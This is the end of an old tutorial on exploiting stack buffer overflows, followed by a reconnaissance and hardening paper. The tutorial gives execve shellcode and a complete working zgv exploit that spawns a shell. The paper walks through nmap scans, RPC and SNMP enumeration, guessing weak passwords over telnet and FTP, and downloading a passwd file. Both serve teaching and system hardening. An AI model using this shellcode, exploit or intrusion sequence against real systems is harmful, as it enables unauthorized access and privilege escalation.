- void lame (void) { char small[30]; gets (small); printf("%s\n", small); } main()
- { lame (); return 0; }
-
- Compile and disassemble it: # cc -ggdb blah.c -o blah /tmp/cca017401.o: In
- function `lame': /root/blah.c:1: the `gets' function is dangerous and should
- not be used. # gdb blah /* short explanation: gdb, the GNU debugger is used
- here to read the binary file and disassemble it (translate bytes to assembler
- code) */ (gdb) disas main Dump of assembler code for function main: 0x80484c8
- <main>: pushl %ebp 0x80484c9 <main+1>: movl %esp,%ebp 0x80484cb <main+3>: call
- 0x80484a0 <lame> 0x80484d0 <main+8>: leave 0x80484d1<main+9>: ret
-
- (gdb) disas lame Dump of assembler code for function lame: /* saving the frame
- pointer onto the stack right before the ret address */ 0x80484a0 <lame>: pushl
- %ebp 0x80484a1 <lame+1>: movl %esp,%ebp /* enlarge the stack by 0x20 or 32. our
- buffer is 30 characters, but the memory is allocated 4byte-wise (because the
- processor uses 32bit words) this is the equivalent to: char small[30]; */
- 0x80484a3 <lame+3>: subl $0x20,%esp /* load a pointer to small[30] (the space on
- the stack, which is located at virtual address 0xffffffe0(%ebp)) on the stack,
- and call the gets function: gets(small); */ 0x80484a6 <lame+6>: leal
- 0xffffffe0(%ebp),%eax 0x80484a9 <lame+9>: pushl %eax 0x80484aa <lame+10>: call
- 0x80483ec <gets> 0x80484af <lame+15>: addl $0x4,%esp /* load the address of
- small and the address of "%s\n" string on stack and call the print function:
- printf("%s\n", small); */ 0x80484b2 <lame+18>: leal 0xffffffe0(%ebp),%eax
- 0x80484b5 <lame+21>: pushl %eax 0x80484b6 <lame+22>: pushl $0x804852c 0x80484bb
- <lame+27>: call 0x80483dc <printf> 0x80484c0 <lame+32>: addl $0x8,%esp /* get
- the return address, 0x80484d0, from stack and return to that address. you don't
- see that explicitly here because it is done by the CPU as 'ret' */ 0x80484c3 :
- leave 0x80484c4 : ret End of assembler dump.
-
- 3a. Overflowing the program # ./blah xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx # ./blah xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
- xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Segmentation fault (core dumped) # gdb blah
- core (gdb) info registers eax: 0x24 36 ecx: 0x804852f 134513967 edx: 0x1 1 ebx:
- 0x11a3c8 1156040 esp: 0xbffffdb8 -1073742408 ebp: 0x787878 7895160
-
- EBP is 0x787878, this means that we have written more data on the stack than the
- input buffer could handle. 0x78 is the hex representation of 'x'. The process
- had a buffer of 32 bytes maximum size. We have written more data into memory
- than allocated for user input and therefore overwritten EBP and the return
- address with 'xxxx', and the process tried to resume execution at address
- 0x787878, which caused it to get a segmentation fault.
-
- 3b. Changing the return address
-
- Lets try to exploit the program to return to lame() instead of return. We have
- to change return address 0x80484d0 to 0x80484cb, that is all. In memory, we
- have: 32 bytes buffer space | 4 bytes saved EBP | 4 bytes RET Here is a simple
- program to put the 4byte return address into a 1byte character buffer: main() {
- int i=0; char buf[44]; for (i=0;i<=40;i+=4) *(long *) &buf[i] = 0x80484cb;
- puts(buf); } # ret ╦╦╦╦╦╦╦╦╦╦╦,
-
- # (ret;cat)|./blah test ╦╦╦╦╦╦╦╦╦╦╦,test test test
-
- Here we are, the program went through the function two times. If an overflow is
- present, the return address of functions can be changed to alter the programs
- execution thread.
-
- 4. Shellcode
-
- To keep it simple, shellcode is simply assembler commands, which we write on the
- stack and then change the retun address to return to the stack. Using this
- method, we can insert code into a vulnerable process and then execute it right
- on the stack. So, lets generate insertable assembler code to run a shell. A
- common system call is execve(), which loads and runs any binary, terminating
- execution of the current process. The manpage gives us the usage: int execve
- (const char *filename, char *const argv [], char *const envp[]); Lets get the
- details of the system call from glibc2: # gdb /lib/libc.so.6 (gdb) disas execve
- Dump of assembler code for function execve: 0x5da00 <execve&lgt;: pushl %ebx
-
-
- /* this is the actual syscall. before a program would call execve, it would push
- the arguments in reverse order on the stack: **envp, **argv, *filename */ /* put
- address of **envp into edx register */ 0x5da01 <execve+1>: movl
- 0x10(%esp,1),%edx /* put address of **argv into ecx register */ 0x5da05
- <execve+5>: movl 0xc(%esp,1),%ecx /* put address of *filename into ebx register
- */ 0x5da09 <execve+9>: movl 0x8(%esp,1),%ebx /* put 0xb in eax register; 0xb ==
- execve in the internal system call table */ 0x5da0d <execve+13>: movl $0xb,%eax
- /* give control to kernel, to execute execve instruction */ 0x5da12 <execve+18>:
- int $0x80
-
- 0x5da14 <execve+20>: popl %ebx 0x5da15 <execve+21>: cmpl $0xfffff001,%eax
- 0x5da1a <execve+26>: jae 0x5da1d <__syscall_error> 0x5da1c <execve+28>: ret End
- of assembler dump.
-
- 4a. making the code portable
-
- We have to apply a trick to be able to make shellcode without having to
- reference the arguments in memory the conventional way, by giving their exact
- address on the memory page, which can only be done at compile time. Once we can
- estimate the size of the shellcode, we can use the instructions jmp <bytes> and
- call <bytes> to go a specified number of bytes back or forth in the execution
- thread. Why use a call? We have the opportunity that a CALL will automatically
- store the return address on the stack, the return address being the next 4 bytes
- after the CALL instruction. By placing a variable right behind the call, we
- indirectly push its address on the stack without having to know it.
-
-
- 0 jmp <Z> (skip Z bytes forward) 2 popl %esi
- ... put function(s) here ...
- Z call <-Z+2> (skip 2 less than Z bytes backward, to POPL) Z+5 .string (first
- variable)
-
- (Note: If you're going to write code more complex than for spawning a simple
- shell, you can put more than one .string behind the code. You know the size of
- those strings and can therefore calculate their relative locations once you know
- where the first string is located.)
-
- 4b. the shellcode
-
-
- global code_start /* we'll need this later, dont mind it */ global code_end
- .data
- code_start: jmp 0x17 popl %esi movl %esi,0x8(%esi) /* put address of **argv
- behind shellcode,
-
- 0x8 bytes behind it so a /bin/sh has place */ xorl %eax,%eax /* put 0 in %eax */
- movb %eax,0x7(%esi) /* put terminating 0 after /bin/sh string */ movl
- %eax,0xc(%esi) /* another 0 to get the size of a long word */ my_execve: movb
- $0xb,%al /* execve( */ movl %esi,%ebx /* "/bin/sh", */ leal 0x8(%esi),%ecx /* &
- of "/bin/sh", */ xorl %edx,%edx /* NULL */ int $0x80 /* ); */ call -0x1c
- .string "/bin/shX" /* X is overwritten by movb %eax,0x7(%esi) */
- code_end:
-
- (The relative offsets 0x17 and -0x1c can be gained by putting in 0x0, compiling,
- disassembling and then looking at the shell codes size.)
-
- This is already working shellcode, though very minimal. You should at least
- disassemble the exit() syscall and attach it (before the 'call'). The real art
- of making shellcode also consists of avoiding any binary zeroes in the code
- (indicates end of input/buffer very often) and modify it for example, so the
- binary code does not contain control or lower characters, which would get
- filtered out by some vulnerable programs. Most of this stuff is done by
- self-modifying code, like we had in the movb %eax,0x7(%esi) instruction. We
- replaced the X with \0, but without having a \0 in the shellcode initially...
-
- Lets test this code... save the above code as code.S (remove comments) and the
- following file as code.c: extern void code_start(); extern void code_end();
- #include <stdio.h> main() { ((void (*)(void)) code_start)(); }
-
- # cc -o code code.S code.c # ./code bash#
-
- You can now convert the shellcode to a hex char buffer. Best way to do this is,
- print it out: #include <stdio.h> extern void code_start(); extern void
- code_end(); main() { fprintf(stderr,"%s",code_start); }
-
- and parse it through aconv -h or bin2c.pl, those tools can be found at:
- http://www.dec.net/~dhg or http://members.tripod.com/mixtersecurity
-
- 5. Writing an exploit
-
- Let us take a look at how to change the return address to point to shellcode put
- on the stack, and write a sample exploit. We will take zgv, because that is one
- of the easiest things to exploit out there :)
-
-
- # export HOME=`perl -e 'printf "a" x 2000'` # zgv Segmentation fault (core
- dumped) # gdb /usr/bin/zgv core #0 0x61616161 in ?? () (gdb) info register esp
- esp: 0xbffff574 -1073744524
-
- Well, this is the top of the stack at crash time. It is safe to presume that we
- can use this as return address to our shellcode.
-
- We will now add some NOP (no operation) instructions before our buffer, so we
- don't have to be 100% correct regarding the prediction of the exact start of our
- shellcode in memory (or even brute forcing it). The function will return onto
- the stack somewhere before our shellcode, work its way through the NOPs to the
- inital JMP command, jump to the CALL, jump back to the popl, and run our code on
- the stack.
-
- Remember, the stack looks like this: at the lowest memory address, the top of
- the stack where ESP points to, the initial variables are stored, namely the
- buffer in zgv that stores the HOME environment variable. After that, we have the
- saved EBP(4bytes) and the return address of the previous function. We must write
- 8 bytes or more behind the buffer to overwrite the return address with our new
- address on the stack.
-
- The buffer in zgv is 1024 bytes big. You can find that out by glancing at the
- code, or by searching for the initial subl $0x400,%esp (=1024) in the vulnerable
- function. We will now put all those parts together in the exploit:
-
- 5a. Sample zgv exploit
-
- /* zgv v3.0 exploit by Mixter buffer overflow tutorial - http://1337.tsx.org
-
- sample exploit, works for example with precompiled redhat 5.x/suse 5.x/redhat
- 6.x/slackware 3.x linux binaries */
-
- #include <stdio.h> #include <unistd.h> #include <stdlib.h>
-
- /* This is the minimal shellcode from the tutorial */ static char shellcode[]=
- "\xeb\x17\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d"
- "\x4e\x08\x31\xd2\xcd\x80\xe8\xe4\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x58";
-
- #define NOP 0x90 #define LEN 1032 #define RET 0xbffff574
-
- int main() { char buffer[LEN]; long retaddr = RET; int i;
-
- fprintf(stderr,"using address 0x%lx\n",retaddr);
-
- /* this fills the whole buffer with the return address, see 3b) */ for
- (i=0;i<LEN;i+=4) *(long *)&buffer[i] = retaddr;
-
- /* this fills the initial buffer with NOP's, 100 chars less than the buffer
- size, so the shellcode and return address fits in comfortably */ for
- (i=0;i<(LEN-strlen(shellcode)-100);i++) *(buffer+i) = NOP;
-
- /* after the end of the NOPs, we copy in the execve() shellcode */
- memcpy(buffer+i,shellcode,strlen(shellcode));
-
- /* export the variable, run zgv */
-
- setenv("HOME", buffer, 1); execlp("zgv","zgv",NULL); return 0; }
-
- /* EOF */
-
- We now have a string looking like this:
-
- [ ... NOP NOP NOP NOP NOP JMP SHELLCODE CALL /bin/sh RET RET RET RET RET RET ]
-
- While zgv's stack looks like this:
-
- v-- 0xbffff574 is here [ S M A L L B U F F E R ] [SAVED EBP] [ORIGINAL RET]
-
- The execution thread of zgv is now as follows:
-
- main ... -> function() -> strcpy(smallbuffer,getenv("HOME")); At this point, zgv
- fails to do bounds checking, writes beyond smallbuffer, and the return address
- to main is overwritten with the return address on the stack. function() does
- leave/ret and the EIP points onto the stack: 0xbffff574 nop 0xbffff575 nop
- 0xbffff576 nop 0xbffff577 jmp $0x24 0xbffff579 popl %esi [... shellcode starts
- here ...] 0xbffff59b call -$0x1c 0xbffff59e .string "/bin/shX"
-
- Lets test the exploit... # cc -o zgx zgx.c # ./zgx using address 0xbffff574
- bash# 5b. further tips on writing exploits There are a lot of programs which are
- tough to exploit, but nonetheless vulnerable. However, there are a lot of tricks
- you can do to get behind filtering and such. There are also other overflow
- techniques which do not necessarily include changing the return address at all
- or only the return address. There are so-called pointer overflows, where a
- pointer that a function allocates can be overwritten by an overflow, altering
- the programs execution flow (an example is the RoTShB bind 4.9 exploit), and
- exploits where the return address points to the shells environment pointer,
- where the shellcode is located instead of being on the stack (this defeats very
- small buffers, and Non-executable stack patches, and can fool some security
- programs, though it can only be performed locally). Another important subject
- for the skilled shellcode author is radically self-modifying code, which
- initially only consists of printable, non-white upper case characters, and then
- modifies itself to put functional shellcode on the stack which it executes, etc.
- You should never, ever have any binary zeroes in your shell code, because it
- will most possibly not work if it contains any. But discussing how to sublimate
- certain assembler commands with others would go beyond the scope of this paper.
- I also suggest reading the other great overflow howto's out there, written by
- aleph1, Taeoh Oh and mudge.
-
- 5c. important note
-
- You will NOT be able to use this tutorial on Windows or Macintosh. Do NOT ask me
- for cc.exe and gdb.exe either! =oP
-
- 6. Conclusions
-
- We have learned, that once an overflow is present which is user dependent, it
- can be exploited about 90% of the time, even though exploiting some situations
- is difficult and takes some skill. Why is it important to write exploits?
- Because ignorance is omniscient in the software industry. There have already
- been reports of vulnerabilities due to buffer overflows in software, though the
- software has not been updated, or the majority of users didn't update, because
- the vulnerability was hard to exploit and nobody believed it created a security
- risk. Then, an exploit actually comes out, proves and practically enables a
- program to be exploitable, and there is usually a big (neccessary) hurry to
- update it.
-
- As for the programmer (you), it is a hard task to write secure programs, but it
- should be taken very serious. This is a specially large concern when writing
- servers, any type of security programs, or programs that are suid root, or
- designed to be run by root, any special accounts, or the system itself. Apply
- bounds checking (strn*, sn*, functions instead of sprintf etc.), prefer
- allocating buffers of a dynamic, input-dependent, size, be careful on
- for/while/etc. loops that gather data and stuff it into a buffer, and generally
- handle user input with very much care are the main principles I suggest.
-
- There has also been made notable effort of the security industry to prevent
- overflow problems with techniques like non-executable stack, suid wrappers,
- guard programs that check return addresses, bounds checking compilers, and so
- on. You should make use of those techniques where possible, but do not fully
- rely on them. Do not assume to be safe at all if you run a vanilla two-year old
- UNIX distribution without updates, but overflow protection or (even more stupid)
- firewalling/IDS. It cannot assure security, if you continue to use insecure
- programs because _all_ security programs are _software_ and can contain
- vulnerabilities themselves, or at least not be perfect. If you apply frequent
- updates _and_ security measures, you can still not expect to be secure, _but_
- you can hope. :-)
-
- mixter@newyorkoffice.com http://members.tripod.com/mixtersecurity
-
-
-
- ===================[What You Don't Know Will Hurt You]===================
- ===================[ by Larry W. Cashdollar ]===================
-
-
-
- I. Overview
-
- The first stage to a successful network attack is the information gathering
- stage. The attacker will collect as much information possible on the target
- host in order to generate a vulnerability list. Relevant to this list will be
- OS type, OS version, services, service daemon versions, network
- topology*,network equipment, firewalls, intrusion detection sensors etc.. The
- purpose of this document is to outline two models of information gathering .
- The first model is "noisy" where the attacker uses all known resources with
- little reguard for what footprints* might be left on the target. The second is
- "stealthy". Wherein the attacker uses methods and packages designed to subvert
- logging facilities on the target. This approach minimizes administrator
- awareness and accountability. I will examine a few systems, ranging from
- Solaris 2.x Sparc systems to Linux/i386 architectures. I will then discuss how
- we can harden a system to minimize information leakage.
-
- II. Utilities and Packages
-
- The utilities we will use can can range from some common system commands to
- network information gathering packages like nmap. I will list a few below and
- give a brief description of each. In the resources section you will find sites
- and security indexes where search engines can dig up a myriad of network
- security tools. These are just a few.
-
- System Utilities.
-
- Utility Description finger Displays user information or current users logged
- into specified host rusers Same as finger but in more detail showmount Displays
- directories available for mounting via NFS. rpcinfo Makes a call to rpc server
- and displays information gathered. dig DNS information gathering tool. Very
- useful. whois internic database lookup program. snmpwalk Gather network
- information using the SNMP protocol. traceroute Show packet path to target
- host. nslookup Convert ip address to conical and visa versa mail bounce Use a
- bogus recipient to gain information on a target host.
-
-
- Tool packages
-
- Tool Description netgrep Netgrep scans an ip range for one specific port. sscan
- Scans multiple vulnerabilities and also uses host gathering techniques. nmap
- Stealth port scanner with stack fingerprinting ability and source spoofing
- techniques, does xmas,syn,fin and UDP scans. mscan older version of sscan,
- still kind of fun. NSS Narrow Security scanner its a perl script which makes it
- nice and portable. Searches for common vulnerabilities like msadc.pl and
- showcode.asp. I found it works very well. CIS Cerebrus internet scanner nessus
- Nessus is a security auditing program that can scan an entire class A subnet for
- multiple DoS attacks,exploits and mis-configurations. It runs in to parts a
- client and server type application is used where all scanning functions are done
- by the server which are controlled by the client. Nessus scans for many modern
- security issues such as Windows vulnerabilities and various Unix exploits.
-
-
- Common services.
-
-
- Service Description SSH Secure Shell an interactive encrypted shell session like
- telnet. NFS Network File System allow file systems to be exported across the
- network and mounted on a remote system. rlogin/rsh/rexec Remote login / Remote
- shell / Remote execute finger Display remote user information and current users
- logged in. FTP File transfer protocol, transfer binary and ASCII files between
- hosts. sendmail Mail delivery system between hosts. WWW World Wide Web a.k.a
- Hyper Text Tranport Protocol. You are looking at it now. netbios Protocol that
- allows MS networked machines to share resources. DNS Domain Name Service, used
- to resolve IP addresses to conical names and vise versa. telnet Start an
- interactive shell on a remote host using the TELNET protocol. QPOP Pop your
- email off the server to read off-line. portmap Maps sun rpc services to their
- respective ports (UDP)
-
-
- III. Information
-
- Just about any information on a target host is useful in creating a database
- of applicable vulnerabilities. What we are attempting to do is determine what
- services the target offers and if any of them can be exploited to leverage
- access to the system. For example knowing the version of the OS that your target
- host is using can help you find information on exploits or bugs specific to that
- OS. By limiting what services we are running and what information is available
- we decrease the window of opportunity for the cracker.
-
- IV. Information Gathering (Noisy)
-
- Just about all of the utilities mentioned above will disclose information
- about the target host. You can piece together parts of a targets network
- topology by bouncing a bad email off of the server. This can disclose a
- weather the mail is relayed internally on another host and the type and
- version of software used to handle internet/exchanged mail. Using
- traceroute you can discover network equipment like routers and switches.
- Portsan will give you a list of services available on the target host.
- These are all common methods adopted by system crackers to gain access to
- their target. Their are many packages out there that automate this process
- of poking, gathering, logging and sorting. For example Sscan is a utility
- for crackers and system admins to gather information on target hosts
- machines also. It scans the host or network for various security problems
- and checks for vulnerabilities. Nessus is another package that scans a
- network for problems as it also checks for DoS attacks and poorly
- configured network equipment like routers and manageable hubs. Just
- grabbing banners with telnet or netcat will divulge important information
- on your target. All of this is fine, but what about more sinister methods
- of information gathering? What about using information you meant to provide
- being used against you? What about the stuff your logs don't catch?
-
- V. Information Gathering (Stealth)
-
- This method uses the common public ports and specially designed utilities to
- gather host, user and system information. When I talk about common public ports
- I am referring to ports that are expected to be accessed by the everyday
- internet user (53*, 80, 25 , 21*). These services can be queried with little or
- no suspicion of the administrator. Some ports have varying degrees of
- noticeably, for example if you do a zone transfer of the target systems dns
- records. This may set off alarms that suspicious activity is at hand, perhaps
- more so then an anonymous ftp connection depending on the site and
- administrators awareness.
-
- These stealth utilities like nmap are designed to take advantage of the tcp
- protocol in order to circumvent logging. This can also be combined with
- protocols that are less common like snmp. An SNMP query can yield information
- like OS type, uptime and machine name*. Quite a few vendors enable SNMP by
- default and most administrators are unaware of the dangers. More common services
- for example anonymous ftp can be mined for information. It is amazing what one
- can find dumped in /pub on some sites, password files, old sensitive emails,
- product information, system information and user lists. I once found a Netscape
- Enterprise Digital Certificate for the site I was auditing sitting in /pub
- waiting for its owner to pick it up*. In cases like this attacker simply
- downloads every readable file hoping to find something interesting.
-
- Probably the number one reason to drive system admins to place closed
- networks on to the internet is the desire to implement a web site. In some cases
- the mad dash to get a web page up shoves proper security techniques aside. The
- old saying don't put all of your eggs in one basket applies to security as well,
- anyway back to the mad dash. This usually means that the hosting company will go
- through great lengths to provide a myriad of information to the WWW community.
- This can be a bad thing however, sometimes more information is too much
- information.
-
- VI. Procedures
-
- This is an overview of how to use each package. For more information
- see the man pages or the package documentation.
-
-
-
- Package Description brscan Broadscan is very simple to use, I plan to add more
- options to it later. The following will search the given ip range for port 80.
- $ ./brscan 192.168.2.1 192.168.3.254 80
-
- smbclient List all shares on WWW, type smbclient for more information on options
- and usage. $lab-1> smbclient -L WWW -I 192.168.2.3
-
- whois $ whois whitehouse.gov@whois.arin.net traceroute $ traceroute
- www.freebsd.org dig $ dig maine.edu @192.168.172.123 axfr snmpwalk Use snmpwalk
- to query the snmp server on a remote host. This protocol is probably less
- commonly thought of as an information gathering tool. It is a powerful one
- however. $lab-1> snmpwalk 192.168.2.3 public system
-
- nss Narrow Security Scanner. hostfiles is file containing a list of ip
- addresses that you are scanning.
-
- ./scanner hostfiles vulnerable-log
-
- Nessus Nessus is a security auditing program that can scan an entire class A
- subnet for multiple DoS attacks, exploits and mis-configurations. It runs in to
- parts a client and server type application is used where all scanning functions
- are done by the server which are controlled by the client. Nessus scans for many
- modern security issues such as Windows vulnerabilities and various Unix
- exploits. The command is as follows: # ./nessusd & # ./nessus &
-
- must issue an xhost command on connecting host.
-
- rpcinfo Display information on remote procedures being offered. $ rpcinfo -p
- hostname
-
- showmount Display information on remote NFS mounts. $ showmount -e hostname
-
- mail bounce An attempt to gather information on a remote host by bouncing a bad
- email off of the server and examining the header information. $ mail -s"test"
- jkhshjkd@hostname.com test message please ignore
- .
-
-
- nmap This is a network mapping package that is capable of stealth scanning and
- OS finger printing. I will attempt to explain these concepts to those of you
- who are unfamiliar with them. Stealth scanning: A normal TCP connection
- consists of a 3 way hand shake in order to connect to the other host, this
- software doesn't complete that 3 way hand shake in order to hide its attempts at
- information gathering.
-
- OS finger printing: Mangled packets are sent in different sequences at the
- target host and depending on the target hosts reaction a guess is made as to
- what that host is running for an OS based on a table of known reactions.
-
- # ./nmap -O -sS 192.168.0.*
-
-
- sscan Sscan is a rewrite of mscan. They are vulerability scanning tools that are
- capable of scanning a large block of ip addresses searching for known
- vulnerabilities like, Qpop, IMAP, DNS, cgi-bin/phf etc. # ./sscan -o
- 192.168.3.28
-
-
- VII. Locking down the house Shut down all unneeded services. Remove all
- unwanted packages. Web server? don't need X, GCC, Sendmail etc... Mail server?
- don't need apache, GNOME, GCC etc... Look through vulnerability archives like
- packetstorm for existing exploits. Search for your
- OS/Software/Services/Packages etc.. Patch accordingly. Audit your setuid
- binaries. find / -perm -4000 > setuid-DATESTAMP store this off-line somewhere.
- Install tripwire but don't rely on this alone. Watch your logs keep a close
- eye on the system as a whole. Mount certain partitions Read only like /usr.
- Under linux you can do a mount /dev/hda2 /usr remount,ro see the man page for
- more details. Join Email lists like CERT, CIAC,Bugtraq and lists specific to
- your vendors. Limit local accounts to root and a manager account. Passwords
- really secure passwords. Something you can pronounce so you can remember it,
- but with no real words. minimum of 7 characters. Rudi^b@1 -->>> Rudy Carrot bat
- one. Limit services, don't run tons of plugs and proxies on your firewall. It
- soon becomes a proxy server once you add that AOL IM Proxy, Real audio and
- NNTP. Use filtering either tcp wrappers or like linux and freeBSD you can use
- ipchains and ipfw to drop unwanted packets. try to break into your own
- network. BUT make sure you have permission in writing, and notify networking
- personnel and management. This could even cause them to secure the boxes
- before hand. Which will not give an accurate security assessment but at least
- it moved you in the right direction. Always maintain patch levels and version
- levels of your services, like bind and sendmail. Only allow zone transfers and
- queries by your network and its trusted hosts (i.e. secondary DNS). VIII.
- Interpretation and Sorting
-
- This section is still being completed. In this section I have examples of
- output from various packages and I will point out significant tid bits of
- information. These are actual logs of what information I was able to find on
- some test systems. My comments are in red.
-
-
- # ./nmap -sT 192.168.18.6
-
- Starting nmap V. 2.3BETA5 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
- Interesting ports on 192.168.18.6 Port State Protocol Service 7 filtered tcp
- echo 19 filtered tcp chargen 25 open tcp smtp 111 open tcp sunrpc 800 open tcp
- mdbs_daemon 844 open tcp unknown 1030 open tcp iad1 1521 open tcp ncube-lm 2001
- open tcp dc 12345 filtered tcp NetBus 12346 filtered tcp NetBus
-
- Nmap run completed -- 1 IP address (1 host up) scanned in 13 seconds
-
-
- Looks like a database (port 800), so why run all of these other services? If
- you dont need them shut them down.
-
-
- $> snmpwalk 192.168.18.6 public system
-
- Timeout: No Response from 192.168.18.6
-
- No snmp daemons running.
-
-
- [bewhaw ~] $ rpcinfo -p 192.168.18.6
-
- program vers proto port service 100000 3 udp 111 rpcbind 100000 2 udp 111
- rpcbind 100000 3 tcp 111 rpcbind 100000 2 tcp 111 rpcbind 100024 1 udp 842
- status 100024 1 tcp 844 status 100021 1 udp 2049 nlockmgr 100021 3 udp 2049
- nlockmgr 100021 4 udp 2049 nlockmgr 391004 1 tcp 1025 391004 1 udp 1025
- 100001 1 udp 1026 rstatd 100001 2 udp 1026 rstatd 100001 3 udp 1026 rstatd
- 100008 1 udp 1027 walld 100002 1 udp 1028 rusersd 100011 1 udp 1029 rquotad
- 100012 1 udp 1030 sprayd 100026 1 udp 1031 bootparam 391011 1 tcp 1026
- 391002 1 tcp 1027 100083 1 tcp 1028 100003 2 udp 2049 nfs 100003 3 udp 2049
- nfs 150001 1 udp 797 pcnfsd 150001 2 udp 797 pcnfsd 150001 1 tcp 800 pcnfsd
- 150001 2 tcp 800 pcnfsd
-
-
- Hmm lets check for nfs, I dont see mountd though.
-
- [brewhaw ~] lwcashd $ showmount -e 192.168.18.6
-
- showmount: 192.168.18.6: RPC: Program not registered
-
- Nope, no exported file systems. Fix: Again shutdown all uneeded services.
-
-
- [muffin ~] $ telnet 192.168.18.6 25
-
- Trying 192.168.18.6... Connected to 192.168.18.6. Escape character is '^]'.
- 220- mail Sendmail 950413.SGI.8.6.12/950213.SGI.AUTOCF ready at Tue, 7 Dec 1999
- 13:52:49 -0500 220 ESMTP spoken here vrfy root 250 Super-User <root@mail> expn
- root 250 Super-User <root@mail>
-
-
- Hmm IRIX 6.2 I'd guess as 8.6.12 is pretty old sendmail. It also is running with
- vrfy and expn functional they can be used to guess valid user accounts. Fix:
- Upgrade sendmail.
-
- Lets try another system, this time we will try to be sneaky.
-
- [pangea ]$ snmpwalk test-03 public system
-
- system.sysDescr.0 = Sun SNMP Agent, Ultra-Enterprise system.sysObjectID.0 = OID:
- enterprises.42.2.1.1 system.sysUpTime.0 = Timeticks: (13902714) 1 day,
- 14:37:07.14 system.sysContact.0 = System administrator system.sysName.0 =
- test-03 system.sysLocation.0 = System administrators office system.sysServices.0
- = 72
-
-
- #./nmap -sF 192.168.1.1
-
-
-
- This snmp call was successful, sometimes we can discover the OS version and
- patch level this way. Fix: Disable snmp by removing the snmp daemon from your
- startup scripts.
-
- [pangea ~] lwcashd $ finger @192.168.7.21 [192.168.7.21] connect: Connection
- refused
-
- Hmm, finger is not running so we cant get a user list that way.. lets try
- another method.
-
- [pangea ~] lwcashd $ rpcinfo -p 192.168.7.21 program vers proto port service
- 100000 4 tcp 111 rpcbind 100000 3 tcp 111 rpcbind 100000 2 tcp 111 rpcbind
- 100000 4 udp 111 rpcbind 100000 3 udp 111 rpcbind 100000 2 udp 111 rpcbind
- 100002 1 udp 32770 rusersd 100002 2 udp 32770 rusersd 100021 1 udp 32776
- nlockmgr 100021 2 udp 32776 nlockmgr 100021 3 udp 32776 nlockmgr 100021 4 udp
- 32776 nlockmgr 100021 1 tcp 32772 nlockmgr 100021 2 tcp 32772 nlockmgr 100021
- 3 tcp 32772 nlockmgr 100021 4 tcp 32772 nlockmgr 1342177279 3 tcp 35567
- 1342177279 1 tcp 35567 1342177280 3 tcp 36146 1342177280 1 tcp 36146
-
- Hmm rusers is running lets see what that gives us.
-
- [pangea ~] lwcashd $ rusers -l 192.168.7.21 www 192.168.7.21:tty0 Jan 18 11:22
- 5:54 www 192.168.7.21:tty0 Jan 18 15:09 5:54
-
-
- We now know of one login on our target www which sometimes has easy to guess
- passwords for web maintenance.
-
- If a service is vital to your server be sure and get information on previous
- bugs and patches. Getting the latest version isnt always the answer as new
- features might introduce new bugs its better to keep track of the latest
- modifications to the new version and upgrade accordingly. For example if their
- are no known vulnerabilies and the latest version adds more bells and whistles
- you might want to wait a while before upgrading. This way the software package
- has time to be poked and prodded by system administrators and security
- personnel.
-
- Enough dry reading already lets see how much information we can gather on
- our target with these tools. Our target is a High School web server. The box is
- hosted by the school off of a state edu connection. The box is actually one of
- my lab machines that I configured in the same exact way the server I audited
- was. All of the examples in this paper will be lab machines setup to depict
- examples as I have seen them in the wild.
-
- Nmap Scan: For usage see the tools section.
-
- [root@Diabolic nmap-2.3BETA6]# ./nmap -O -sX 192.168.15.19
-
- Starting nmap V. 2.3BETA6 by Fyodor (fyodor@dhp.com, www.insecure.org/nmap/)
- Interesting ports on dt065ndb.maine.rr.com (192.168.15.19):
-
- Port State Protocol Service 23 open tcp telnet 25 open tcp smtp 80 open tcp http
- TCP Sequence Prediction: Class=truly random Difficulty=9999999 (Good luck!)
- Remote operating system guess: Linux 2.0.35-37
-
- Nmap run completed -- 1 IP address (1 host up) scanned in 4 seconds
-
- Our target host is running a web server and telnet for remote administration.
- They probably feel that the server is somewhat secure because they have shutdown
- most of the services. The next step is to fire up a web browser and see what
- they have for site content. <screen dump?>
-
- What I am looking for is any information that will get me what accounts exist on
- the target and whom they belong to. I find to be what I consider half of the
- password file HTMLized and up for display, a contact page. I don't really know
- if the accounts on the contact page are local or alias to a mail server
- internally. I assume its all local accounts as most school admins aren't ready
- to setup a split horizon DNS with a smart relaying sendmail configuration.
-
- The contact page is generally a list of email addresses for that site of about
- ten to fifteen teachers, staff and even the webmaster. I guess that the
- principals secretary might be a good candidate for a password guessing attack
- and try the following.
-
- Trying 192.168.15.19... Connected to 192.168.15.19. Escape character is '^]'.
-
- Red Hat Linux release 5.2 (Apollo) Kernel 2.0.36 on an i486 login: jsmith
- Password:jsmith<enter> [jsmith@dt065ndb jsmith]$
-
- Woops, they are local accounts and poorly passworded as I suspected. As nmap
- revealed this is a linux box. Redhat 5.2 to be specific and trivial to locate an
- exploit to get root. At this stage the game is all over. With minimal
- information gathering, nmap scan and web mining we were able to gain access to
- our target. If they had mail handled elsewhere, limited local accounts to root
- and 1 admin user with good passwords this wouldn't have happened. (entries in
- hosts.allow/deny wouldn't have killed them either)
-
- More electronic dumpster diving with ftp.
-
- [pangea /tmp] $ ftp 192.168.41.29
-
- Connected to zig.internal.net. 220 zig FTP server (UNIX(r) System V Release
- 4.0) ready. Name (zig.internal.net:security): anonymous 331 Guest login ok,
- send ident as password. Password: 230 Guest login ok, access restrictions
- apply. ftp> cd etc 250 CWD command successful. ftp> get passwd 200 PORT
- command successful. 150 ASCII data connection for passwd (192.168.12.2,33793)
- (523 bytes). 226 ASCII Transfer complete. local: passwd remote: passwd 538
- bytes received in 0.0059 seconds (89 Kbytes/s)
-
- Ok, grabbing the password file isnt so steathly. But I want to check to see if
- they screwed up at all.
-
- $> tail -n1 passwd ftpadm:x:1113:1000::/home/ftpadm:/bin/csh
-
- Yes, they have screwed up this is possibly (if the passwd file is not out of
- date) a local user account with a vaild shell.
-
- [muffin /tmp] $ ftp 192.168.41.29
-
- Connected to zig.internal.net. 220 zig FTP server (UNIX(r) System V Release
- 4.0) ready. Name (zig.internal.net:security): ftpadm 331 Password required for
- ftpadm. Password: (ftpadm1) 230 User ftpadm logged in. ftp>
-
- First try. Probably the second worst password you could have besides ftpadm.
- Dangerous combinations
-
